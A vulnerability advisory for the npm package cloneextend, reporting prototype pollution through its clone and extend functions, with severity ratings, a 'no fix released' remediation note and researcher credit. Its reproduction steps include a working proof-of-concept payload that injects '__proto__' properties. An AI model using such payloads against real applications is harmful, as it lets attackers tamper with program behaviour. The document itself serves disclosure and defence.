Prototype Pollution In Cloneextend: CX-2021-4799

Severity

Severity: 5.6 - Medium Severity

Advisory Timeline Summary
Affected versions of cloneextend (npm) are vulnerable to prototype pollution via the clone and extend functions.

Product

All versions of cloneextend npm package.

Impact

If untrusted data reaches one of the affected functions, prototype pollution can be achieved. The impact will depend on the application.

Steps To Reproduce

var ce = require('cloneextend');
ce.extend({},JSON.parse('{"__proto__":{"polluted":1}}'))
console.log({}.polluted)
>1
 
ce.clone(JSON.parse('{"__proto__":{"a":1}}'))
console.log({}.a)
>1

Expected Result:

1 will be printed to the console.

Remediation

Currently no fix has been released. As a workaround, avoid passing untrusted inputs to the vulnerable functions.

Properties

Attack Vector: Network

Attack Complexity: High

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: Low

Integrity: Low

Availability: Low

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. NPM Package